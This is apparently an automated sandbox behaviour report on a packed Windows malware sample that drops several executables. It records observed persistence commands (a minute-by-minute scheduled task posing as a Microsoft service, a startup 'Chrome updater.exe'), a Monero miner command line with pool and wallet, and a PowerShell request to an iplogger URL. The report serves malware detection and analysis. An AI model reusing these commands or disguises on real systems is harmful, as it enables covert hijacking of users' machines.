Code function: 22_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

22_2_00403248

Contains functionality to check free disk space

Source: C:\Users\user\AppData\Local\Temp\evs.exe

Code function: 22_2_0040450D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

22_2_0040450D

Contains functionality to enum processes or threads

Source: C:\Users\user\AppData\Local\Temp\jo.exe

Code function: 31_2_008B82EB CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

31_2_008B82EB

Contains functionality to instantiate COM classes

Source: C:\Users\user\AppData\Local\Temp\evs.exe

Code function: 22_2_00402138 CoCreateInstance,MultiByteToWideChar,

22_2_00402138

Contains functionality to load and extract PE file embedded resources

Source: C:\Users\user\AppData\Local\Temp\jo.exe

Code function: 31_2_004365D0 LocalAlloc,CreateTimerQueue,GetTickCount,ZombifyActCtx,GetCompressedFileSizeA,VirtualProtect,MapUserPhysicalPages,CreateJobObjectW,RtlAllocateHeap,GetFileAttributesA,LoadResource,RtlSizeHeap,

31_2_004365D0

Creates files inside the user directory

Source: C:\Users\user\Desktop\8TD8GfTtaW.exe

File created: C:\Users\user\AppData\Local\nulhfhsi.exe

Jump to behavior

Creates mutexes

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:120:WilError_01
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe	Mutant created: \Sessions\1\BaseNamedObjects\3d8f939a-7191-48a7-9jo8-2cc28dtec736
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1488:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Mutant created: \Sessions\1\BaseNamedObjects\QWERTYUIOPASDFGHJKLZXCVBNM1234567890
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01

Creates temporary files

Source: C:\Users\user\AppData\Local\nulhfhsi.exe

File created: C:\Users\user\AppData\Local\Temp\tmp6692.tmp

Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\hello_C#.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Queries process information (via WMI, Win32_Process)

Source: C:\Users\user\AppData\Local\nulhfhsi.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Reads ini files

Source: C:\Users\user\Desktop\8TD8GfTtaW.exe

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Users\user\Desktop\8TD8GfTtaW.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\revs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\revs.exe	File read: C:\Windows\System32\drivers\etc\hosts

Sample is known by Antivirus

Source: 8TD8GfTtaW.exe

Virustotal: Detection: 43%

Spawns processes

Source: unknown	Process created: C:\Users\user\Desktop\8TD8GfTtaW.exe 'C:\Users\user\Desktop\8TD8GfTtaW.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\nulhfhsi.exe 'C:\Users\user\AppData\Local\nulhfhsi.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\lxoqz3o0.exe 'C:\Users\user\AppData\Local\lxoqz3o0.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\evs.exe 'C:\Users\user\AppData\Local\Temp\evs.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'cmd' /c start '' 'hello_C# (2).exe' & start '' 'hello_C#.exe' & start '' 'jo.exe' & powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\revs.exe 'C:\Users\user\AppData\Local\Temp\revs.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe 'hello_C# (2).exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\hello_C#.exe 'hello_C#.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\jo.exe 'jo.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6064 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe'
Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	Process created: C:\Users\user\AppData\Local\nulhfhsi.exe 'C:\Users\user\AppData\Local\nulhfhsi.exe'			Jump to behavior
Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	Process created: C:\Users\user\AppData\Local\lxoqz3o0.exe 'C:\Users\user\AppData\Local\lxoqz3o0.exe'			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Process created: C:\Users\user\AppData\Local\Temp\evs.exe 'C:\Users\user\AppData\Local\Temp\evs.exe'			Jump to behavior
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Process created: C:\Users\user\AppData\Local\Temp\revs.exe 'C:\Users\user\AppData\Local\Temp\revs.exe'			Jump to behavior
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f			Jump to behavior
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	Process created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\evs.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'cmd' /c start '' 'hello_C# (2).exe' & start '' 'hello_C#.exe' & start '' 'jo.exe' & powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe 'hello_C# (2).exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\hello_C#.exe 'hello_C#.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\jo.exe 'jo.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6064 CREDAT:17410 /prefetch:2

Uses an in-process (OLE) Automation server

Source: C:\Users\user\Desktop\8TD8GfTtaW.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32

Jump to behavior

Found GUI installer (many successful clicks)

Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\hello_C#.exe	Automated click: OK

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Submission file is bigger than most known malware samples

Source: 8TD8GfTtaW.exe

Static file information: File size 2649312 > 1048576

Uses new MSVCR Dlls

Source: C:\Users\user\AppData\Local\Temp\jo.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

PE file has a big raw section

Source: 8TD8GfTtaW.exe

Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x281a00

Binary contains paths to debug symbols

Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 8TD8GfTtaW.exe, 00000000.00000002.268372071.000000000139C000.00000040.00020000.sdmp, lxoqz3o0.exe, 00000006.00000002.498547574.0000000000100000.00000040.00020000.sdmp, RantimeBroker.exe, 0000000E.00000002.501902431.0000000001140000.00000040.00020000.sdmp, revs.exe, 00000019.00000002.500038394.000000000041A000.00000040.00020000.sdmp, Chrome updater.exe, 00000025.00000002.500186949.000000000041A000.00000040.00020000.sdmp
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.6.dr
Source:	Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: nulhfhsi.exe, 00000004.00000002.444265627.00000000004B6000.00000040.00020000.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	Unpacked PE file: 0.2.8TD8GfTtaW.exe.1390000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Unpacked PE file: 4.2.nulhfhsi.exe.3b0000.0.unpack :ER; :R; :R;.idata:W;.apk0:R;.themida:EW;.boot:ER;.apk1:ER;.apk2:ER;.reloc:R;.rsrc:R; vs :ER; :R; :R;
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	Unpacked PE file: 6.2.lxoqz3o0.exe.f0000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe	Unpacked PE file: 14.2.RantimeBroker.exe.1130000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
Source: C:\Users\user\AppData\Local\Temp\revs.exe	Unpacked PE file: 25.2.revs.exe.400000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Unpacked PE file: 31.2.jo.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe	Unpacked PE file: 37.2.Chrome updater.exe.400000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\jo.exe

Unpacked PE file: 31.2.jo.exe.400000.0.unpack

Binary contains a suspicious time stamp

Source: initial sample

Static PE information: 0xEEB543EE [Tue Nov 27 12:13:34 2096 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\jo.exe

Code function: 31_2_00412560 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

31_2_00412560

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

PE file contains an invalid checksum

Source: hello_C# (2).exe.22.dr	Static PE information: real checksum: 0x0 should be: 0x48f6
Source: hello_C#.exe.22.dr	Static PE information: real checksum: 0x0 should be: 0x48f6
Source: Chrome updater.exe.25.dr	Static PE information: real checksum: 0x463d62 should be: 0x46ee7e
Source: lxoqz3o0.exe.0.dr	Static PE information: real checksum: 0x280d9c should be: 0x285c9a
Source: RantimeBroker.exe.6.dr	Static PE information: real checksum: 0x280d9c should be: 0x285c9a
Source: 8TD8GfTtaW.exe	Static PE information: real checksum: 0x28a5e8 should be: 0x2888e7

PE file contains sections with non-standard names

Source: 8TD8GfTtaW.exe	Static PE information: section name:
Source: 8TD8GfTtaW.exe	Static PE information: section name:
Source: 8TD8GfTtaW.exe	Static PE information: section name:
Source: 8TD8GfTtaW.exe	Static PE information: section name: .themida
Source: 8TD8GfTtaW.exe	Static PE information: section name: .boot
Source: nulhfhsi.exe.0.dr	Static PE information: section name:
Source: nulhfhsi.exe.0.dr	Static PE information: section name:
Source: nulhfhsi.exe.0.dr	Static PE information: section name:
Source: nulhfhsi.exe.0.dr	Static PE information: section name: .apk0
Source: nulhfhsi.exe.0.dr	Static PE information: section name: .themida
Source: nulhfhsi.exe.0.dr	Static PE information: section name: .boot
Source: nulhfhsi.exe.0.dr	Static PE information: section name: .apk1
Source: nulhfhsi.exe.0.dr	Static PE information: section name: .apk2
Source: lxoqz3o0.exe.0.dr	Static PE information: section name:
Source: lxoqz3o0.exe.0.dr	Static PE information: section name:
Source: lxoqz3o0.exe.0.dr	Static PE information: section name:
Source: lxoqz3o0.exe.0.dr	Static PE information: section name: .themida
Source: lxoqz3o0.exe.0.dr	Static PE information: section name: .boot
Source: RantimeBroker.exe.6.dr	Static PE information: section name:
Source: RantimeBroker.exe.6.dr	Static PE information: section name:
Source: RantimeBroker.exe.6.dr	Static PE information: section name:
Source: RantimeBroker.exe.6.dr	Static PE information: section name: .themida
Source: RantimeBroker.exe.6.dr	Static PE information: section name: .boot
Source: cpu.exe.6.dr	Static PE information: section name: _RANDOMX
Source: cpu.exe.6.dr	Static PE information: section name: _SHA3_25
Source: cpu.exe.6.dr	Static PE information: section name: _TEXT_CN
Source: cpu.exe.6.dr	Static PE information: section name: _TEXT_CN
Source: cpu.exe.6.dr	Static PE information: section name: _RDATA
Source: cpu.exe.6.dr	Static PE information: section name: 0
Source: cpu.exe.6.dr	Static PE information: section name: 1
Source: Chrome updater.exe.25.dr	Static PE information: section name:
Source: Chrome updater.exe.25.dr	Static PE information: section name:
Source: Chrome updater.exe.25.dr	Static PE information: section name:
Source: Chrome updater.exe.25.dr	Static PE information: section name: .themida
Source: Chrome updater.exe.25.dr	Static PE information: section name: .boot

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Code function: 4_2_0057EF16 push edx; mov dword ptr [esp], edi		4_2_0070042A
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Code function: 4_2_0057EF16 push edx; mov dword ptr [esp], edi		4_2_007004D5
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Code function: 4_2_0057EF16 push edx; mov dword ptr [esp], edi		4_2_007005C7
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Code function: 4_2_0057EF16 push 27AFD0DBh; mov dword ptr [esp], eax		4_2_00700F0A
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Code function: 4_2_0057EF16 push 2A72EC14h; mov dword ptr [esp], edi		4_2_00701156
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	Code function: 4_2_03726E26 push ss; ret		4_2_03726E27
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00406D5D push ds; ret		31_2_00406D5B
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00406D72 push esi; iretd		31_2_00406DA9
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00406D3B push ds; ret		31_2_00406D5B
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_008BB0BB push ecx; ret		31_2_008BB0CB
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_008BAD00 push ecx; ret		31_2_008BAD09
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_0042290C push dword ptr [ebp+eax-17h]; retf		31_2_00422910
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00853D8B push ds; ret		31_2_00853DAB
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00853DAD push ds; ret		31_2_00853DAB
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00853DC2 push esi; iretd		31_2_00853DF9
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00AB48B7 push ds; ret		31_2_00AB48D7
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00ABB885 push esi; ret		31_2_00ABB8AD
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00AB309B push esp; iretd		31_2_00AB30B3
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00AB48EE push esi; iretd		31_2_00AB4925
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00AB48D9 push ds; ret		31_2_00AB48D7
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00ABA020 push 00000000h; ret		31_2_00ABA025
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00ABAA50 push ss; ret		31_2_00ABAA59
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00ABA587 push ss; retf		31_2_00ABA588
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00AB4598 push edi; iretd		31_2_00AB45B7
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00AB69EE push cs; iretd		31_2_00AB6A21
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00ABB3ED push edx; ret		31_2_00ABB3EF
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00ABA7D0 push edx; iretd		31_2_00ABA7D1
Source: C:\Users\user\AppData\Local\Temp\jo.exe	Code function: 31_2_00ABB103 push eax; retf		31_2_00ABB10E

Binary may include packed or encrypted code

Source: initial sample	Static PE information: section name: entropy: 7.60533357948
Source: initial sample	Static PE information: section name: entropy: 7.89210158409
Source: initial sample	Static PE information: section name: entropy: 7.89210158409
Source: initial sample	Static PE information: section name: entropy: 7.95998591239

Persistence and Installation Behavior:

Sample is not signed and drops a device driver

Source: C:\Users\user\AppData\Local\lxoqz3o0.exe

File created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys

Jump to behavior

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\evs.exe	File created: C:\Users\user\AppData\Local\Temp\nsx24D0.tmp\KSRDY0PL.dll			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\evs.exe	File created: C:\Users\user\AppData\Local\Temp\jo.exe			Jump to dropped file
Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	File created: C:\Users\user\AppData\Local\nulhfhsi.exe			Jump to dropped file
Source: C:\Users\user\Desktop\8TD8GfTtaW.exe	File created: C:\Users\user\AppData\Local\lxoqz3o0.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	File created: C:\Users\user\AppData\Local\Temp\revs.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	File created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	File created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\evs.exe	File created: C:\Users\user\AppData\Local\Temp\hello_C#.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\revs.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\nulhfhsi.exe	File created: C:\Users\user\AppData\Local\Temp\evs.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\evs.exe	File created: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\lxoqz3o0.exe	File created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe			Jump to dropped file

Boot Survival:

Drops PE files to the startup folder

Source: C:\Users\user\AppData\Local\Temp\revs.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\AppData\Local\Temp\revs.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe

Stores files to the Windows start menu directory

Source: C:\Users\user\AppData\Local\Temp\revs.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 3214
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 3214
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 3214
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 3214
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 3214
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49743

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\8TD8GfTtaW.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

